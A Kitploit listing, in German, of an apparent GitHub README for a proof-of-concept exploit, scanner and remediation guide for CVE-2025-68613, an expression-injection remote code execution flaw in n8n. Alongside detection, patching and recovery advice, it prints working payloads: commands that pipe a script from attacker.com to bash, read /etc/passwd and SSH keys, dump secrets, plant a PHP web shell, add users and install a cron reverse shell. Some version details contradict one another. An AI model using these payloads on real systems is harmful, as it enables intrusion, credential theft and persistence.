Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-68613-POC — Öffentlicher PoC + Scanner und Forschung für CVE-2025-68613: Kritische RCE in n8n Workflow-Automatisierung via Expression Injection (CVSS 10.0). Enthält Erkennungstools, vollständigen Exploit und Behebungsanleitung. | Kitploit
Tools/GitHubGitHub/thestingr/cve-2025-68613-poc
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsPapers & ForschungLernen & BildungRed TeamingPayload-Entwicklung
26vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
thestingr/cve-2025-68613-poc

CVE-2025-68613-POC

Öffentlicher PoC + Scanner und Forschung für CVE-2025-68613: Kritische RCE in n8n Workflow-Automatisierung via Expression Injection (CVSS 10.0). Enthält Erkennungstools, vollständigen Exploit und Behebungsanleitung.

Repository anzeigen
Teilen

🚨 CVE-2025-68613: Kritische RCE-Sicherheitslücke in n8n

Sprache: Python CVSS-Bewertung: 10.0 Kritisch Exploit-Status: Proof of Concept verfügbar CVE-Status: CVE-2025-68613 Offengelegt Version: v1.0.2 Zielplattform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

Table of Contents

  1. Übersicht
  2. Was ist n8n?
  3. Grundlagen der Sicherheitslücke
  4. Technische Details
  5. Betroffene Versionen
  6. Ausnutzungsmechanismen
  7. Auswirkungen in der Praxis
  8. Erkennungsmethoden
  9. Behebung & Abschwächung
  10. Ressourcen & Referenzen

Übersicht

CVE-2025-68613 ist eine kritische Remote Code Execution (RCE)-Sicherheitslücke, die in n8n, einer beliebten Open-Source-Workflow-Automatisierungsplattform, entdeckt wurde. Diese Sicherheitslücke ermöglicht authentifizierten Benutzern die Ausführung von beliebigem Code auf dem Server, was potenziell zu einer vollständigen Systemkompromittierung führen kann.

Kurzübersicht

  • CVE ID: CVE-2025-68613
  • CVSS Score: 9.9 - 10.0 (Kritisch)
  • Vulnerability Type: Expression Injection → Remote Code Execution
  • CWE: CWE-913 (Unzureichende Kontrolle von dynamisch verwalteten Code-Ressourcen)
  • Attack Vector: Netzwerk
  • Authentication Required: Ja (Niedrige Berechtigung - kein Admin-Zugriff erforderlich) |- Status: Proof of Concept verfügbar (funktioniert nachweislich auf v1.121.0)

Was ist n8n?

n8n ist eine Open-Source-Workflow-Automatisierungsplattform, die es Benutzern ermöglicht:

  • Verschiedene APIs, Datenbanken und Dienste zu verbinden
  • Wiederkehrende Geschäftsprozesse zu automatisieren
  • Komplexe Workflows ohne umfangreiche Programmierkenntnisse zu erstellen
  • Lokal oder in der Cloud bereitzustellen

Warum n8n eine kritische Infrastruktur ist

Organisationen nutzen n8n, um:

  • Datenbanken mit Cloud-Diensten zu integrieren
  • Datenverarbeitungspipelines zu automatisieren
  • CRMs, ERPs und interne Systeme zu verbinden
  • Sensible Daten und API-Anmeldedaten zu verwalten

Diese zentrale Rolle in der IT-Infrastruktur macht Sicherheitslücken besonders gefährlich, da sie Angreifern Zugang zu gesamten Netzwerken und sensiblen Daten verschaffen können.


Tools in diesem Repository

Dieses Repository enthält einsatzbereite Tools zur Erkennung von Sicherheitslücken und zum Testen von Exploits:

1. Scanner: cve-2025-68613-scanner.py

Zweck: Sichere, nicht ausnutzende Erkennung von anfälligen n8n-Instanzen

Funktionen:

  • Passive Versionserkennung aus HTTP-Antworten
  • Keine Authentifizierung erforderlich
  • Keine Payload-Ausführung
  • Überprüft mehrere gängige Pfade (/, /rest/settings, /healthz, /api/v1/health)
  • Sicher für autorisierte Sicherheitsbewertungen

Verwendung: python3 cve-2025-68613-scanner.py --target https://target.n8n.instancebash python3 cve-2025-68613-scanner.py -u http://target:5678

root@kitploit:~
**Output**:
- Exit code 0: Nicht anfällig
- Exit code 1: Version unbestimmt (möglicherweise gepatcht oder versteckt)
- Exit code 2: Anfällige Version erkannt

### 2. Nuclei Template: `CVE-2025-68613.yaml`
**Zweck**: Automatisierte Schwachstellenerkennung und grundlegende Ausdrucksauswertungstests

**Funktionen**:
- Erfordert gültigen Authentifizierungstoken
- Testet Expression-Injection-Fähigkeit
- Versucht, den Node.js-Globalkontext zu lesen (process.platform)
- Erstellt Test-Workflows zur Validierung des RCE-Vektors
- CVSS 10.0 Kritische Schweregrad-Einstufung

**Verwendung**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. Vollständiger Exploit: exploit_cve-2025-68613.py

Zweck: Vollständiger Proof-of-Concept-Exploit mit mehreren Angriffs-Payloads

Funktionen:

  • Vollständige Authentifizierungshandhabung
  • Mehrere Exploit-Payloads:
    • info: Systeminformationen sammeln (Betriebssystem, Architektur, Node.js-Version, aktueller Benutzer)
    • cmd: Beliebige Systembefehle ausführen
    • env: Alle Umgebungsvariablen extrahieren (gibt Anmeldedaten, API-Schlüssel, Geheimnisse preis)
    • read: Sensitive Dateien vom Dateisystem lesen (SSH-Schlüssel, Konfigurationsdateien usw.)
    • write: Dateien ins Dateisystem schreiben (Persistenz, Hintertüren usw.)
    • revshell: Reverse-Shell-Verbindung für interaktiven Zugriff herstellen
  • Automatische Workflow-Bereinigung
  • Fehlerbehandlung und Statusmeldung

Voraussetzungen:

  • Gültige n8n-Benutzeranmeldedaten (E-Mail/Passwort)
  • Python 3.6+ mit der requests-Bibliothek
  • Netzwerkzugriff auf die Ziel-n8n-Instanz

Installation:```bash pip install requests chmod +x exploit_cve-2025-68613.py

root@kitploit:~
**Anwendungsbeispiele**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

Wie es funktioniert:

  1. Authentifiziert sich gegenüber n8n mit den bereitgestellten Anmeldedaten
  2. Erstellt einen bösartigen Workflow mit Expression-Injection-Payload
  3. Der Payload bricht aus dem Expression-Sandbox aus, indem this.constructor.constructor() verwendet wird
  4. Führt den Payload über process.platform oder andere Node.js-APIs aus
  5. Ruft die Ergebnisse aus der Workflow-Ausführung ab
  6. Räumt auf, indem der Test-Workflow gelöscht wird

Exit-Codes:

  • 0: Erfolgreiche Ausnutzung
  • 1: Authentifizierung oder Ausnutzung fehlgeschlagen

Grundlagen der Schwachstelle

Was ist das Problem?

Einfach ausgedrückt: n8n erlaubt es Benutzern, Ausdrücke (Expressions) in Workflows zu schreiben, um Daten dynamisch zu verarbeiten. Diese Ausdrücke werden jedoch ohne ordnungsgemäßen Sandbox-Schutz ausgewertet, sodass Angreifer aus dem vorgesehenen Ausführungskontext ausbrechen und beliebigen Code auf dem Server ausführen können.

Das Kernproblem

Wenn Sie einen Workflow in n8n erstellen, können Sie „Ausdrücke" verwenden, um Daten zu manipulieren. Diese Ausdrücke sollen in einer eingeschränkten Umgebung ausgeführt werden. Die Schwachstelle zeigt jedoch, dass diese Ausdrücke auf das zugrunde liegende System zugreifen können, sodass ein Angreifer Folgendes tun kann:

  1. Systembefehle ausführen
  2. Dateien auf dem Server lesen/schreiben
  3. Umgebungsvariablen (API-Schlüssel, Passwörter, Geheimnisse) stehlen
  4. Daten ändern oder löschen
  5. Persistenz für dauerhaften Zugriff einrichten

Warum es so gefährlich ist

  • Niedrige Einstiegshürde: Erfordert nur einen Benutzer-Login (keine speziellen Admin-Rechte)
  • Breite Anwendbarkeit: Viele Organisationen erlauben nicht-technischen Benutzern das Erstellen von Workflows
  • Hohe Auswirkungen: Läuft mit vollständigen Rechten des n8n-Prozesses
  • Datenzugriff: Kann auf alle Daten zugreifen, auf die n8n Zugriff hat (Datenbanken, APIs, Anmeldedaten)
  • Netzwerkposition: n8n sitzt oft im Zentrum kritischer Infrastruktur, was laterale Bewegung ermöglicht

Technische Details

Wie die Schwachstelle funktioniert

Schritt 1: Auswertung von Workflow-Ausdrücken

Wenn ein Benutzer einen Workflow in n8n erstellt, kann er Ausdrücke verwenden, um Daten zu verarbeiten:``` Input: User creates a workflow with an expression n8n Expression Engine: Evaluates the expression Expected Output: Processed data Actual Output (Vulnerable): Expression execution context not isolated from runtime

root@kitploit:~
#### Schritt 2: Expression Injection
Ein Angreifer erstellt einen bösartigen Ausdruck, der die beabsichtigte Sandbox umgeht:```javascript
// Example: Malicious expression in workflow
${require('child_process').execSync('id')}

Schritt 3: Code-Ausführung

Der Ausdruck wird ohne ordnungsgemäße Isolierung ausgewertet, sodass der Angreifer Folgendes tun kann:

  • Systemfunktionen aufrufen
  • Shell-Befehle ausführen
  • Auf das Dateisystem zugreifen
  • Umgebungsvariablen auslesen

Die Grundursache

Die Schwachstelle resultiert aus unzureichendem Sandboxing in der Ausdrucksauswertungs-Engine. Das n8n-Team wertete Ausdrücke in einem Kontext aus, der:

  • Zugriff auf require() oder ähnliche Modul-Ladefunktionen erlaubte
  • Zugriff auf System-APIs nicht ordnungsgemäß einschränkte
  • Die Ausdruckssyntax nicht validierte oder filterte
  • Prototype-Pollution-Angriffe nicht verhinderte
  • Die Ausführungsumgebung nicht von der zugrundeliegenden Node.js-Laufzeitumgebung isolierte

Code-Ausführungspfad```

User Input (Workflow Expression) ↓ Expression Parser ↓ Evaluation Engine (VULNERABLE - Not Sandboxed) ↓ Direct Access to Node.js Runtime ↓ System Command Execution / File Access / Credential Theft

root@kitploit:~
---

## Betroffene Versionen

### Anfälliger Bereich

Alle n8n-Versionen ab **0.211.0** bis zu den folgenden Versionen sind anfällig:
- `0.211.0` → `1.120.3`
- `1.121.0`

### Gepatchte Versionen

Die Sicherheitslücke wurde in folgenden Versionen behoben:
- ✅ `1.120.4` und später im 1.120.x-Zweig
- ✅ `1.121.1` und später im 1.121.x-Zweig
- ✅ `1.122.0` und alle neueren Versionen

### So überprüfen Sie Ihre Version```bash
# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"

# Or check the admin panel
# Go to Settings → About → Version

Getestete Versionen und Kompatibilität

Verifiziert funktionierend

  • n8n v1.121.0: ✅ Vollständig ausnutzbar (bestätigte RCE, Expression-Injection funktioniert)
  • n8n v0.211.0 - v1.120.3: ✅ Innerhalb des anfälligen Bereichs laut NVD (nicht einzeln getestet)

Bekannte Probleme

  • REST-Ausführungslimit: Der Endpunkt /rest/workflows/{id}/run gibt in v1.121.0 einen HTTP-500-Fehler zurück
    • Workaround: Expression-Injection funktioniert einwandfrei, RCE bestätigt über:
      1. Manuellen Klick auf den "Test Step"-Button in der UI (erwiesenermaßen funktionierend)
      2. Workflow-Ausgabeerfassung
    • Dies ist eine API-Einschränkung, kein Exploit-Fehler

Nicht getestet

  • n8n v0.212.0+: Außerhalb des dokumentierten anfälligen Bereichs, wahrscheinlich gepatcht (siehe GitHub-Issue #1)
  • Windows Server-Bereitstellungen: Begrenzte Testdaten für Windows-spezifische Umgebungen

Versionsunterstützungserklärung

Der Exploit ist dafür ausgelegt, gegen den in NVD dokumentierten anfälligen Bereich zu arbeiten:

  • Bestätigt anfällig: 0.211.0 bis 1.120.3, plus 1.121.0
  • Gepatchte Versionen: 1.120.4, 1.121.1, 1.122.0 und spätere

Wenn Tests gegen Versionen außerhalb dieses Bereichs durchgeführt werden, ist Erfolg nicht garantiert.


Exploitation-Mechanik

Was kann ein Angreifer tun?

Sobald ein authentifizierter Benutzer (oder ein Angreifer mit gültigen Anmeldedaten) diese Schwachstelle ausnutzt, kann der Angreifer:

1. Beliebige Systembefehle ausführen```javascript

${require('child_process').execSync('whoami').toString()} // Returns: root (or whatever user runs n8n)

${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()} // Downloads and executes a shell script

root@kitploit:~
#### 2. Dateien vom Server lesen```javascript
${require('fs').readFileSync('/etc/passwd', 'utf-8')}
// Reads sensitive system files

${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
// Steals SSH keys

3. Umgebungsvariablen lesen```javascript

${Object.keys(process.env).join(', ')} // Lists all environment variables

${process.env.DATABASE_PASSWORD} // Extracts specific secrets

root@kitploit:~
#### 4. Schädliche Dateien schreiben```javascript
${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
// Plants a web shell for persistence

${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
// Adds SSH access

5. Zugriff auf verbundene Dienste```javascript

// Access workflow credentials (stored API keys, passwords) // Modify or view connected databases // Exfiltrate data from all integrated systems

root@kitploit:~
#### 6. Persistenz einrichten```javascript
${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
// Creates a cron job for reverse shell access

${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
// Creates a new user account

Beispiel für ein Angriffsszenario

Szenario aus der Praxis: Unternehmen, das n8n verwendet

  1. Angreifer erlangt Anmeldedaten: Durch Phishing, Wiederverwendung von Anmeldedaten oder schwaches Passwort
  2. Meldet sich bei n8n an: Verwendet legitimes Benutzerkonto
  3. Erstellt einen „harmlosen" Workflow: Gibt vor, dass es der Datenverarbeitung dient
  4. Schleust bösartigen Ausdruck ein: Versteckt die Ausnutzung in einem Workflow-Schritt
  5. Führt Code aus: Führt Befehle mit den Berechtigungen des n8n-Prozesses aus
  6. Exfiltriert Daten: Stiehlt API-Schlüssel, Datenbank-Anmeldedaten, Kundendaten
  7. Stellt Persistenz her: Installiert Hintertüren, erstellt neue Administratorkonten
  8. Bewegt sich lateral: Verwendet gestohlene Anmeldedaten, um auf andere Systeme zuzugreifen

Auswirkungen in der Praxis

Auswirkungen auf die Vertraulichkeit (HOCH)

  • Zugriff auf sensible Daten, die von Workflows verarbeitet werden
  • Extraktion von API-Schlüsseln, Datenbankpasswörtern, Verschlüsselungsschlüsseln
  • Lesen von Konfigurationsdateien, Protokollen und Geheimnissen
  • Mögliche DSGVO-/Compliance-Verstöße durch Datendiebstahl

Auswirkungen auf die Integrität (HOCH)

  • Änderung bestehender Workflows zur Sabotage von Abläufen
  • Einschleusung bösartiger Workflows, die Daten korrumpieren
  • Veränderung von Workflow-Ausgaben, die nachgelagerte Systeme beeinträchtigen
  • Hinterlegen von Hintertüren für dauerhaften Zugriff

Auswirkungen auf die Verfügbarkeit (HOCH)

  • Löschung kritischer Workflows, die Geschäftsunterbrechungen verursachen
  • Änderung von Systemdateien, die zu Dienstausfällen führen
  • Ressourcenerschöpfung durch bösartige Automatisierung
  • Ransom-Angriffe, bei denen Angreifer Zahlung für die Wiederherstellung von Systemen fordern

Beispiele für geschäftliche Auswirkungen

Produktionsunternehmen

  • n8n automatisiert die Auftragsabwicklung und Bestandsverwaltung
  • Angreifer exfiltriert Kundenaufträge und Lieferanteninformationen
  • Ändert Workflows, um falsche Produkte an Kunden zu senden
  • Ergebnis: Vertrauensverlust bei Kunden, rechtliche Haftung, Betriebsunterbrechung

Finanzdienstleistungen

  • n8n integriert Bank-APIs und Zahlungsabwicklung
  • Angreifer stiehlt API-Anmeldedaten und Authentifizierungstoken
  • Leitet Transaktionen um oder erstellt betrügerische Datensätze
  • Ergebnis: Regulatorische Strafen, Kundenentschädigung, Reputationsschaden

Gesundheitsorganisation

  • n8n verarbeitet die Integration und Berichterstattung von Patientendaten
  • Angreifer erhält Zugriff auf geschützte Gesundheitsinformationen (PHI)
  • Ändert Krankenakten oder blockiert kritische Warnmeldungen
  • Ergebnis: HIPAA-Verstöße, Patientenschäden, Haftung der Organisation

Erkennungsmethoden

Methode 1: Versionserkennungsscanner

Sicheres, nicht ausnutzendes Erkennungsskript (im Original-Repository enthalten):```bash python3 CVE-2025-68613.py -u http://your-n8n-instance:5678

root@kitploit:~
**Ausgabebeispiele**```
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Methode 2: Verwenden der Nuclei-Vorlage

Automatisiertes Scannen mit Nuclei:```bash

Single target

nuclei -t CVE-2025-68613.yaml -u http://target:5678

Multiple targets from file

nuclei -t CVE-2025-68613.yaml -l targets.txt

root@kitploit:~
**So funktioniert es**:
1. Sendet HTTP-Anfragen an übliche n8n-Pfade
2. Extrahiert Versionsmetadaten aus HTML/Headern
3. Dekodiert base64-kodierte Konfiguration, falls vorhanden
4. Vergleicht Version mit angreifbaren Bereichen
5. Meldet, ob Instanz angreifbar ist

### Methode 3: Manuelles Banner-Grabbing```bash
# Check for n8n in HTTP response
curl -s http://target:5678/ | grep -i "n8n"

# Check headers
curl -I http://target:5678/ | grep -i "n8n"

# Check common paths
curl -s http://target:5678/api/v1/health
curl -s http://target:5678/rest/settings
curl -s http://target:5678/healthz

Methode 4: Netzwerkerkundung```bash

Find n8n instances using Shodan

shodan search "n8n" --limit 10

Use favicon hash detection

nmap -p 5678 --script http-favicon target.com

root@kitploit:~
### Indikatoren für Ausnutzung (IOCs)

**Protokollanzeichen**:
- Ungewöhnliche Ausdrucksauswertungen in Workflow-Logs
- Ausdrucksfehler, die Systembefehle enthalten
- Zugriff auf sensible Dateien (z. B. Verweise auf /etc/passwd)
- Unerwartetes Starten von Prozessen ausgehend vom n8n-Prozess

**Systemanzeichen**:
- Neue Benutzerkonten auf dem Server erstellt
- Unerwartete SSH-Schlüssel in authorized_keys
- Neue Cron-Jobs oder geplante Aufgaben
- Änderungen an Systemdateien
- Reverse-Shell-Verbindungen vom n8n-Server aus

---

## Behebung & Eindämmung

### PRIMÄRE LÖSUNG: Sofortiges Upgrade

**Dies ist die einzige vollständige Behebung der Sicherheitslücke.**

#### Schritt 1: Sichern Sie Ihre Daten```bash
# Backup n8n database
cp -r /path/to/n8n/database ./backup/

# Backup workflows
n8n export --backup-dir ./backup/

Schritt 2: n8n aktualisieren

Docker verwenden (empfohlen):```bash

Pull the latest patched version

docker pull n8nio/n8n:1.122.0 # Or later

Stop current instance

docker stop n8n-container

Start with new version

docker run -d --name n8n-patched
-p 5678:5678
-v n8n_data:/home/node/.n8n
n8nio/n8n:1.122.0

root@kitploit:~
**Verwendung von npm**:```bash
# Backup first
npm run export --backup

# Update
npm update n8n

# Or specific version
npm install [email protected]

Verwendung des Systempaketmanagers:```bash

Debian/Ubuntu

sudo apt update && sudo apt upgrade n8n

Or manual download

wget https://github.com/n8n-io/n8n/releases/download/[email protected]/n8n.tar.gz

root@kitploit:~
#### Schritt 3: Überprüfen des Updates```bash
# Check version after update
curl http://localhost:5678/api/v1/health | grep version

# Ensure n8n is running
curl http://localhost:5678/ | grep -i "n8n"

VORÜBERGEHENDE MASSNAHME: Während des Upgrades

Wichtig: Diese beheben die Sicherheitslücke NICHT. Verwenden Sie sie nur als vorübergehende Maßnahmen während der Planung von Upgrades.

1. Einschränken von Workflow-Berechtigungen```

n8n Admin Panel → Users & Permissions ├── Disable "User Can Create Workflows" for non-admin users ├── Restrict "User Can Edit Workflows" to trusted administrators only ├── Review existing user roles and remove unnecessary permissions └── Audit workflow creators for suspicious accounts

root@kitploit:~
#### 2. Workflow-Änderungen überwachen```
n8n Admin Panel → Settings → Audit Log
├── Enable comprehensive audit logging
├── Monitor for suspicious workflow modifications
├── Alert on expression evaluations in logs
└── Review workflow change history regularly

3. Netzwerkisolation```bash

Restrict n8n network access

sudo ufw default deny incoming sudo ufw allow from 192.168.1.0/24 to any port 5678 # Only internal network sudo ufw enable

Or using iptables

sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 5678 -j DROP

root@kitploit:~
#### 4. n8n mit minimalen Berechtigungen ausführen```bash
# Create dedicated n8n user
sudo useradd -r -s /bin/false n8n-user

# Run n8n as this user
sudo -u n8n-user n8n

# Or in Docker with user specification
docker run -u 1000 n8nio/n8n:latest

5. Starke Authentifizierung aktivieren```

n8n Admin Panel → Settings → Authentication ├── Enable 2FA for all accounts ├── Enforce strong password policies ├── Review and disable unnecessary service accounts ├── Implement SSO if available └── Disable any guest/demo accounts

root@kitploit:~
#### 6. Containerisierung & Isolation```bash
# Run n8n in a restricted Docker container
docker run -d \
  --security-opt=no-new-privileges:true \
  --read-only \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp \
  -p 5678:5678 \
  n8nio/n8n:current-version

7. Regelmäßige Überprüfung```bash

Monitor for suspicious activities

Check for new files in n8n directories

find /path/to/n8n -type f -mtime -1

Monitor process activity

ps aux | grep n8n netstat -tlnp | grep n8n

Check for unauthorized SSH keys

cat ~/.ssh/authorized_keys

Review system logs

journalctl -u n8n -n 100

root@kitploit:~
---

## Risikobewertungsmatrix

| Szenario | Risikostufe | Wahrscheinlichkeit | Auswirkung | Priorität |
|----------|-----------|-----------|--------|----------|
| Ungepatchte, internetzugängliche n8n | KRITISCH | HOCH | Vollständige Kompromittierung | 🔴 DRINGEND |
| Ungepatchte, nur intern genutzte n8n | HOCH | MITTEL | Risiko durch Insider-Bedrohung | 🟠 HOCH |
| Gepatchte n8n | NIEDRIG | NIEDRIG | N/V | ✅ Gelöst |
| Ungepatcht + Berechtigungseinschränkungen | MITTEL | MITTEL | Auf vertrauenswürdige Benutzer beschränkt | 🟡 MITTEL |

---

## Schritt-für-Schritt-Wiederherstellung nach Kompromittierung

### Sofortmaßnahmen (erste Stunde)
1. **System isolieren**: Vom Netzwerk trennen
2. **Dienst stoppen**: `sudo systemctl stop n8n`
3. **Logs sichern**: Alle Logs vor dem Löschen sichern
4. **Team alarmieren**: Sicherheitsteam und Management benachrichtigen
5. **Ausmaß bewerten**: Feststellen, auf welche Daten n8n zugegriffen hat

### Untersuchung (erster Tag)
1. **Audit-Logs prüfen**: Nach verdächtigen Aktivitäten suchen
2. **Netzwerkverkehr analysieren**: Nach Datenexfiltration suchen
3. **Dateiänderungen prüfen**: Installierte Hintertüren finden
4. **Benutzerkonten überprüfen**: Nach neuen oder geänderten Konten suchen
5. **Zugangsdaten prüfen**: Alle von n8n verwendeten API-Schlüssel und Passwörter zurücksetzen

### Behebung (Tage 2-7)
1. **Kompletten Systemneubau durchführen**: Nicht nur aktualisieren, sondern von einem sauberen Image neu aufbauen
2. **Zugangsdaten rotieren**: Alle Passwörter, API-Schlüssel, Token zurücksetzen
3. **Alles patchen**: Alle verbundenen Systeme aktualisieren
4. **Aus Backup wiederherstellen**: Saubere Backups aus der Zeit vor der Kompromittierung verwenden
5. **Sicherheitsaudit durchführen**: Vollständige Sicherheitsbewertung durchführen

### Nach dem Vorfall (Wochen 2+)
1. **Überwachung implementieren**: Kontinuierliches Logging und Alarmierung einrichten
2. **Prozesse anpassen**: Vorfall-Reaktionsverfahren aktualisieren
3. **Benutzerschulung**: Teams zu Sicherheitsbest Practices schulen
4. **Schwachstellenscans**: Regelmäßige Scans auf ähnliche Probleme
5. **Compliance-Prüfung**: Sicherstellen, dass alle Vorschriften eingehalten werden (DSGVO, HIPAA usw.)

---

## Prävention in der Zukunft

### Sicherheitsempfehlungen für n8n

1. **n8n aktuell halten**
   - Automatische Updates aktivieren, falls verfügbar
   - n8n-Sicherheitswarnungen abonnieren
   - Patches vor dem Produktiveinsatz im Staging testen

2. **Zugriffskontrolle**
   - Prinzip der geringsten Privilegien anwenden
   - Starke Passwörter und 2FA verlangen
   - SSO für Unternehmensbereitstellungen implementieren
   - Regelmäßige Zugriffsüberprüfungen und Audits durchführen

3. **Workflow-Management**
   - Alle Workflows auf verdächtige Logik prüfen
   - Code-Review-Prozess für Workflows implementieren
   - Namenskonventionen zur Identifizierung kritischer Workflows verwenden
   - Workflows regelmäßig sichern

4. **Zugangsdatenverwaltung**
   - Niemals Zugangsdaten in Workflows speichern
   - Umgebungsvariablen für sensible Daten verwenden
   - Zugangsdaten regelmäßig rotieren
   - Zugriff auf Zugangsdaten prüfen

5. **Überwachung und Logging**
   - Umfassendes Audit-Logging aktivieren
   - Auf ungewöhnliche Aktivitäten achten
   - Warnungen für verdächtige Vorgänge einrichten
   - Regelmäßige Log-Überprüfung und -Analyse

6. **Netzwerksicherheit**
   - n8n in isolierten Netzwerksegmenten betreiben
   - Netzwerkzugriff auf erforderliche Dienste beschränken
   - VPN/Firewall für Fernzugriff verwenden
   - Netzwerkverkehr auf Anomalien überwachen

7. **Vorfall-Reaktion**
   - Vorfall-Reaktionsplan erstellen
   Eskalationsverfahren definieren
   - Regelmäßige Sicherheitsübungen durchführen
   - Aktuelle Kontaktlisten pflegen

---

## Fehlerbehebung

### Problem: "Exit-Code 1: Authentifizierung oder Ausnutzung fehlgeschlagen"

**Häufige Ursachen**:
1. **Falsche Zugangsdaten** (am häufigsten)
   - Lösung: Überprüfen Sie, ob die Zugangsdaten zuerst für die Web-UI-Anmeldung funktionieren
   - Versuchen Sie: `curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"[email protected]","password":"pass"}'`

2. **Benutzer hat keine Berechtigungen zum Erstellen von Workflows**
   - Lösung: Verwenden Sie ein Administratorkonto oder ein Benutzerkonto mit Workflow-Erstellungsrechten
   - Überprüfen: Admin-Panel → Benutzer und Berechtigungen

3. **Version ist gepatcht** (Version > 1.121.0)
   - Lösung: Überprüfen Sie zuerst die Version mit dem Scanner: `python3 cve-2025-68613-scanner.py -u http://target:5678`
   - Erwartet: Scanner sollte "Vulnerable" melden (Exit-Code 2)

4. **API-Struktur geändert** (ältere/neuere Versionen können abweichen)
   - Lösung: NVD-Hinweis prüfen: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
   - Am wahrscheinlichsten beim Testen von Versionen außerhalb des dokumentierten Bereichs

5. **Netzwerk/Firewall blockiert**
   - Lösung: Konnektivität prüfen: `curl http://target:5678/`
   - Prüfen: Firewall-Regeln, Proxy-Einstellungen, SSL-Zertifikate

### Problem: Scanner meldet Fehlalarme (falsche Version erkannt)

**Behoben in v1.02**: Der Scanner verwendet jetzt die base64-dekodierte Sentry-Konfiguration aus Meta-Tags anstelle eines einfachen Regex. Dadurch werden Fehlalarme vermieden, bei denen die Node.js-Version als n8n-Version erkannt wurde.

**Was sich geändert hat**:
- Primäre Quelle: `<meta name="n8n:config:sentry" content="[BASE64]">` extrahieren und decodieren
- Fallback: Regex wird nur verwendet, wenn keine Sentry-Konfiguration verfügbar ist
- Ergebnis: Genaue Versionserkennung ohne Fehlalarme

**So verwenden Sie den Scanner v1.02**:```bash
# Update to v1.02
git pull origin main

# Run scanner
python3 cve-2025-68613-scanner.py -u http://target:5678

Problem: REST-Ausführung gibt 500-Fehler zurück

Dies ist KEIN Fehler im Exploit - es ist eine API-Einschränkung.

Erklärung:

  • Der /rest/workflows/{id}/run-Endpunkt gibt HTTP 500 in n8n v1.121.0 zurück
  • Dies ist eine Einschränkung des n8n-API-Designs, kein Exploit-Fehler
  • Ausdrucks-Injektion funktioniert IMMER NOCH über die Benutzeroberfläche

Workaround:

  1. Exploit erstellt Workflow mit bösartigem Ausdruck ✅ Funktioniert
  2. Ausdruck wird ausgewertet und Code ausgeführt ✅ Funktioniert (durch manuelle Tests belegt)
  3. Manuell auf die Schaltfläche „Test Step“ in der UI klicken, um den Ausdruck auszulösen ✅ Funktioniert
  4. Ausgabe aus den Workflow-Ergebnissen lesen ✅ Funktioniert

Beleg: Erfasste Flagge auf TryHackMe: THM{n8n_exposed_workflow}


Ressourcen & Referenzen

Offizielle Quellen

  • n8n GitHub Repository: https://github.com/n8n-io/n8n
  • n8n Sicherheitshinweise: https://github.com/n8n-io/n8n/security/advisories
  • n8n Dokumentation: https://docs.n8n.io/

CVE-Informationen

  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
  • CVEDetails: https://www.cvedetails.com/cve/CVE-2025-68613/
  • CVETodo: https://cvetodo.com/cve/CVE-2025-68613

Sicherheitsressourcen

  • NIST CWE-913: https://cwe.mitre.org/data/definitions/913.html
  • OWASP Code Injection: https://owasp.org/www-community/attacks/Code_Injection
  • OWASP Sandbox Bypass: https://owasp.org/www-community/attacks/Sandbox_Escape

Zusammenfassung

CVE-2025-68613 ist eine kritische Schwachstelle, die sofortiges Handeln erfordert. Die Kombination aus:

  • Fähigkeit zur Ausdrucks-Injektion
  • Fehlen einer Sandbox
  • Niedrige Privilegienanforderungen
  • Große Angriffsfläche (viele Benutzer erstellen Workflows)
  • Zentrale Position in der IT-Infrastruktur

...macht dies zu einer der gefährlichsten Schwachstellen in Workflow-Automatisierungsplattformen.

